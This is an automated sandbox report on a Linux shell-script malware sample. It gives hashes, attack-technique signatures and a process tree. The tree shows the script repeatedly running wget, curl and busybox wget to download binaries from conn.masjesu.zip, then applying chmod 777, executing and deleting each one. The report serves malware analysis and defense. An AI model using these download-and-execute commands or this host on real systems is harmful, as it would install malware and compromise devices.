Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/11/2024, 02:08
Static task
static1
Behavioral task
behavioral1
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
-
Size
10KB
-
MD5
212b02f29854addd09c83c096b0a28d8
-
SHA1
6d3e25cbd8a8331cfec87e951c697876d1ce21c5
-
SHA256
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788
-
SHA512
8ae72b9af1d4e17bda84c690db9c365158e62d7dcf4dae5a7f42a9edf5f1faae4b8955062fcadd5a6f40c68045060f91734e883bd234aa98d078149be0382a85
-
SSDEEP
192:bZR+7fUY+OQy21N8fzFNEZR+7f2Y8D1N8fz8:7OQyPNAV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 814 chmod 872 chmod 879 chmod 886 chmod 900 chmod 921 chmod 928 chmod 730 chmod 943 chmod 936 chmod 840 chmod 781 chmod 863 chmod 893 chmod 914 chmod 950 chmod 738 chmod 806 chmod 821 chmod 907 chmod 752 chmod -
Executes dropped EXE 21 IoCs
ioc pid Process /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 731 9TkivajhPvPyUBtriVhosaz1inakDISTYm /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi 739 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S 753 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK 783 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 807 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk 815 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp 822 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 841 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU 864 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi 873 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 880 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n 887 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw 894 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs 901 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 908 9TkivajhPvPyUBtriVhosaz1inakDISTYm /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi 915 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S 922 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK 929 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 937 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk 944 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp 951 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 63 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 825 curl 882 wget 896 wget 735 curl 737 busybox 824 wget 904 curl 939 wget 942 busybox 779 busybox 918 curl 925 curl 946 wget 804 busybox 885 busybox 758 wget 851 curl 890 curl 818 curl 899 busybox 932 curl 720 curl 813 busybox 845 wget 860 busybox 869 curl 892 busybox 906 busybox 940 curl 947 curl 871 busybox 883 curl 927 busybox 949 busybox 820 busybox 836 busybox 910 wget 917 wget 920 busybox 797 curl 868 wget 903 wget 708 wget 817 wget 924 wget 931 wget 734 wget 878 busybox 911 curl 935 busybox 741 wget 770 curl 787 wget 811 curl 875 wget 745 curl 749 busybox 876 curl 897 curl 913 busybox 728 busybox 810 wget 889 wget -
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S curl File opened for modification /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp curl File opened for modification /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S curl File opened for modification /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk curl File opened for modification /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi curl File opened for modification /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 curl File opened for modification /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 curl File opened for modification /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU curl File opened for modification /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi curl File opened for modification /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp curl File opened for modification /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK curl File opened for modification /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 curl File opened for modification /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw curl File opened for modification /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk curl File opened for modification /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n curl File opened for modification /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK curl File opened for modification /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 curl
Processes
-
/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:708
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:733
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:734
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:740
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:741
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:756
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:758
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:779
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:785
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:787
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:804
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:809
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:810
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:813
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:816
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:817
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:820
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:860
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:878
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:881
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:882
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:885
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:888
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:889
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:892
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:916
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:917
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:920
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:927
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:949
-
-
